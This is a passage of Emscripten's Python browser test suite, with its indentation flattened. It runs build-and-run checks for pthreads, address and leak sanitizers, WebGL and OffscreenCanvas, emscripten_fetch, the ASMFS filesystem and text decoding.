self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
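# For context, MAIN_THREAD_EM_ASM_INT proxies an EM_ASM block to the main thread and returns
# an int; a minimal hedged sketch with illustrative values (not the test's own code):
#
#   #include <emscripten.h>
#   int sum = MAIN_THREAD_EM_ASM_INT({ return $0 + $1; }, 3, 4);  // sum == 7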
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
create_test_file('wasm.cpp',
self.with_report_result(
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp')).read()))
self.compile_btest(['wasm.cpp', '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func);
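# The pattern under test is the standard POSIX one; a minimal hedged sketch (not the
# contents of tests/sigalrm.cpp):
#
#   #include <signal.h>
#   #include <unistd.h>
#   static void on_alarm(int sig) { /* report success */ }
#   int main() {
#     signal(SIGALRM, on_alarm);
#     alarm(1);  // delivers SIGALRM after ~1 second
#     /* keep the runtime alive until the handler fires */
#   }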
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
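# For reference, a Module.instantiateWasm callback receives the import object and a success
# callback, and is expected to invoke the latter with the instantiated instance. A hedged
# sketch of what the shell page might wire up (the actual manual_wasm_instantiate.html is
# authoritative; the .wasm filename below is an assumption):
#
#   Module.instantiateWasm = function(imports, successCallback) {
#     WebAssembly.instantiateStreaming(fetch('manual_wasm_instantiate.wasm'), imports)
#       .then(function(output) { successCallback(output.instance); });
#     return {}; // exports are delivered asynchronously via successCallback
#   };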
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5496), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has first been used to render WebGL content in a pthread
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# When testing WebGL draft extensions like this in Chrome, you may need to append
# --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# When testing WebGL draft extensions like this in Chrome, you may need to append
# --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also, there is a known bug with baseInstance on Mac Intel that can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER=1',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES2'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it by using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transfer of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that the shell html page can preallocate the typed array and assign it to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
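# A hedged sketch of what such a shell page does (test_preallocated_heap_shell.html is the
# actual code; the size below is illustrative only):
#
#   <script>
#     var Module = {
#       buffer: new ArrayBuffer(64 * 1024 * 1024)  // preallocated asm.js heap
#     };
#   </script>
#   {{{ SCRIPT }}}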
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
  # Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
  # Tests emscripten_fetch() usage when the user passes none of the main 3 flags (append/replace/no_download).
  # In that case, append is implicitly understood.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
